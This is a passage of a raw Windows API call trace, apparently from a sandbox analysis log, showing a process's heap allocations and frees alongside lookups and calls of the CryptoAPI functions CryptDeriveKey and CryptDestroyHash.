0x2e51310 [0221.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0221.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0221.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0221.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0221.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0221.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0221.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0221.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e513d0 [0221.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e513d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0221.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.367] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0221.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0221.368] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa876d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0221.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0221.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0221.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0221.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0221.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0221.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0221.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0221.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0221.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0221.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0221.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0221.374] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.374] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0221.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0221.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0221.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0221.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0221.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0221.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0221.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0221.392] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0221.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0221.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0221.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0221.392] CryptDestroyHash (hHash=0xa876d0) returned 1 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0221.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0221.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0221.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0221.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0221.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0221.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: 